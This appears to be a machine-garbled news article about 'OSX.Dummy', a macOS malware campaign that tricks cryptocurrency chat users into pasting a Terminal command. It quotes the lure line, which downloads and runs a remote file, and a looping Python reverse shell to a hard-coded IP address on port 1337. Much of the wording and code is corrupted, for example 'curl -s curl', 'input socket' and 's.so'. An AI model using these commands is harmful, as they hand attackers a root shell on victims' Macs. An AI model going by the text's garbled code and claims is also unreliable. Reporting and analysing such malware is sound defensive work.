Someone impersonating moderators of cryptocurrency-related discussion channels on Slack, Discord, and other social messaging platforms is trying to trick others into installing macOS malware. A social media campaign consists of posting a script in discussions and encouraging people to copy and paste that script into a Terminal window on their Macs. The protocol downloads a large file (34 megabytes) and executes it, setting up a remote connection that acts as a back door for the attack.
Patrick WardleA Mac malware expert, also analyzed the malware and called it “OSX.Dummy” because, as he wrote:
- The infection method is dumb
- The vast majority of binary is dumb
- Persistence is lame (and therefore also dumb)
- abilities are rather limited (and therefore rather dumb)
- it is not necessary to see at every step (that wall)
- and finally, the malware saves the user’s password to dumpdummy
The attack, first noticed by Remco Verhoef of SANS today, receiving its payload from a remote server, makes that file executable, and runs it. It looks like this:
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
The monster binary carries with it a host of libraries, including Open SSL libraries to encrypt your communications back to the server — a system running in the data center of hosting provider CrownCloud. Once running, you use the sudo command to make yourself owned by the macOS root user. In order for this to happen, the victim has to enter a password to allow the script to continue. The script stores that password in a temporary file called “dumpdummy”. The script also gives permission to add itself to the startup list for macOS — making itself persistent.
The code behind the script, as Wardle notes, is a recurring Python command-line call with a hard-coded IP address for the connection using port 1337—obviously leetspeak comedy.
#!/bin/bashwhen:
do
Python -c ‘input socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.so (“185.243.115.230”,1337)); os.dup2 (s.fileno(),0); os.dup2 (s.fileno(),1); os.dup2 (s.fileno(),2); p=subprocess.call((“/bin/sh””-i”));’
sleep 5
do
The motive for the attack is not yet clear. But because all of this is run through a Terminal window, it bypasses MacOS’s GateKeeper protection, albeit unsigned code. And it gives the attacker the ability to run command-line code as the root user on infected Macs. Therefore, the code has to overcome the common sense of the victim.